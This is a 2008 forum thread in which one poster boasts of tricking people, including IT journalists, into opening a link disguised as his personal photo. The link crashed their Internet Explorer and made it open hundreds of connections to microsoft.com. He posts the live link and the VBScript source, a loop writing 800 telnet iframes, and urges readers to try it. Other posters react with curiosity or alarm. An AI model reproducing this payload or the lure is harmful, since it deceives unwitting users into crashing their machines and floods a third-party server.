Re: The anticipation of a viral exploit of the JPE G vulnerability
|
Regwinder Singh |
|
11/18/2008 1:06:16 AM |
They got to the good old JPEG format.. god damn it.. where will it stop?? hehe.. i had this sick pleasure of watching people look at their IE window crashing in flames along with a few hundred FTP connections to the microsoft.com site hehe. this is the trick: i had this "image" on a remote server and i used to send people the url.. stating that they would find my personal picture there, the curious and the dumb.. clicked on that link.. and their IE Browsers would crash & burn. I managed to trick some pretty smart people (from romanian IT magazines) to use that link.. and crashed their servers.. it was so fun... but in a way harmless comparing to the stuff crackers do now.. i'll search for that i mage and post the source code. it's something very simple written in JS and it works for crying out loud :d it sure works Post Comments |
|
Re: i am curious about it
|
Michael Calcupp |
|
11/18/2008 1:08:49 AM |
Oh! bad boy...i am curious about it. Post Comments |
|
http://www.h7ck.home.ro/novocaine.jpg Here it is.. copy & paste the link in your IE window.. if you want it to work but... DO NOT USE THIS UNDER INTERNET EXPLORER the source code Code: <script type="text/vbscript"> for a=1 to 800 document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">") next </script> it's repeated a few hundred times.. so the size of the file resembles a jpeg [/code] Post Comments |
|
Regwinder, Maybe you should remove the link Post Comments |
|
Cleo, You can click it.. it will cause no permanent damage to your system.. just be sure that you close everything.. and you are ready for a reboot copy&paste the link in your IE browser window to see if what it does.. if you click the link here you will get an error messag. Post Comments |
|
Re: The anticipation of a viral exploit of the JPE G vulnerability
|
Cleopatra Kolmkeita |
|
11/18/2008 1:11:28 AM |
So what exactly happens?? I want to find out, but I dont want my comp to get messed up Post Comments |
|
Re: I pray God that no IE user will click that lin k
|
Michael Calcupp |
|
11/18/2008 1:12:56 AM |
I pray God that no IE user will click that link. Post Comments |
|
Re: Its tempting to click
|
Cleopatra Kolmkeita |
|
11/18/2008 1:14:13 AM |
Its tempting to click, but seeing that it will mess up IE, I cant... Post Comments |
|